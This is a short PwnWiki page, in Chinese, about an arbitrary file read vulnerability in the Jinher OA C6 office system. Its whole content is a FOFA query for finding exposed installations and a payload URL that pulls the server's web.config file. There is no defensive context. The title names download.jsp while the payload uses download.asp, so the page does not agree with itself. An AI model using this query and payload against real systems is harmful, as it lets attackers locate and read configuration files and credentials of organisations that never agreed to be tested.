金和OA C6 download.jsp 任意文件讀取漏洞

From PwnWiki

Revision as of 17:24, 18 June 2021 by Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==漏洞影響== 金和OA </translate> ==FOFA== <pre> app="Jinher-OA" </pre> ==Payload== <pre> /C6/Jhsoft.Web.module/testbill/dj/download.asp?file...")

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

Other languages:

Chinese • ‎English • ‎中文（中国大陆）‎

漏洞影響

金和OA

FOFA

app="Jinher-OA"

Payload

/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config

讀取web.config

/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config

Retrieved from "https://pwnwiki.com/index.php?title=金和OA_C6_download.jsp_任意文件讀取漏洞&oldid=5300"